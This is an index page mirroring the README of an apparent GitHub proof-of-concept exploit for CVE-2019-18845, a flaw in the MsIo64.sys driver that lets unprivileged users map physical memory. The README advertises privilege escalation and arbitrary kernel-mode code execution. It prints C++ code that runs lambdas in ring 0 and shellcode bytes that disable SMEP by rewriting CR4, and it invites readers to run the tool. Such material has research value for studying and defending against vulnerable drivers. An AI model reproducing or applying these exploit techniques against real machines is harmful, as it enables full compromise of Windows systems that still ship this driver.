Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/kkent030315/msioexploit

Exploit MsIo vulnerable driver
https://github.com/kkent030315/msioexploit

cve-2019-18845 kernel kernel-exploit kernel-exploits windows

Last synced: 4 months ago
JSON representation

Exploit MsIo vulnerable driver

Awesome Lists containing this project

README 

        




















# MsIoExploit



Exploit MsIo vulnerable driver



# Description



This is a PoC for [CVE-2019-18845](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18845) `MsIo64.sys` allowing non-privileged user to map/unmap arbitrary physical memory via `ZwMapViewOfSection` / `ZwUnmapViweOfSection`.

If you are interested in abusing physical memory mapping, see [project anycall](https://github.com/kkent030315/anycall/tree/main/anycall) has full implementation of client and driver-sided functionalities.



Allowing non-privileged(non-kernel) component to map arbitrary physical memory is the most *bad* practice and critically vulnerable way which allowing attacker to gain full control of the system as I demonstrated arbitrary NT-Kernel API invocation in this PoC.



You can try by yourself by executing this while you have driver running.



Also this driver and `MsIo64.dll` are fully copy & paste of [IO-Memory](https://github.com/Bleichroder/IO-Memory).



This exploit was first reported 2019 but still remains unfixed and hardware vendors like ASRock still use this driver.



### Features



- Privilege Escalation

- Shellcode Execution

- Arbitrary code execution in CPL0 context

  - `__writemsr`, `__cpuid` or whatever



I've implemented a replicate of Capcom exploit so you can execute any code in CPL0 context, as follows:



```cpp

unsigned long long cr4 = 0;

static auto ntoskrnl_image_base = this->ntoskrnl_image_base;

static uint16_t dos_signature = 0x0;



this->disable_smep(&cr4);

// lambda will be called in the CPL0

this->exec_in_kernel([]() -> void

    {

        // direct access to the kernel virtual memory

        dos_signature = *(uint16_t*)(ntoskrnl_image_base);

    });

this->enable_smep(&cr4);

```



Please note that the lambda function cannot be captured because captured lambda functions cannot be a function pointer. so only `static` members can access from inside of the lambda. also in the context of CPL0 it is impossible to call a few specific functions like `printf` will cause BSOD of course.



Shellcode execution will be look like:



```cpp

void exploit::disable_smep(unsigned long long* old_cr4)

{

    static uint8_t disable_smep_shellcode[] = {

        0xFA,                               // cli

        0x0F, 0x20, 0xE0,                   // mov rax, cr4

        0x48, 0x89, 0x01,                   // mov QWORD PTR [rcx], rax

        0x48, 0x25, 0xFF, 0xFF, 0xEF, 0xFF, // and rax, 0xffffffffffefffff

        0x0F, 0x22, 0xE0,                   // mov cr4, rax

        0xC3 };                             // ret



    this->execute_shellcode_in_kernel(

        reinterpret_cast(&disable_smep_shellcode),

        sizeof(disable_smep_shellcode),

        old_cr4);

}

```



Now we have a full control out of the system, no need to do dumbass thing like mapping unsigned drivers.



# Usage



```bash

> MsIoExploit.exe

```



# Credit



Several sources regarding token steal are from [ExploitCapcom](https://github.com/tandasat/ExploitCapcom)



Credit [@tandasat](https://github.com/tandasat/)



# License



MIT copyright Kento Oki \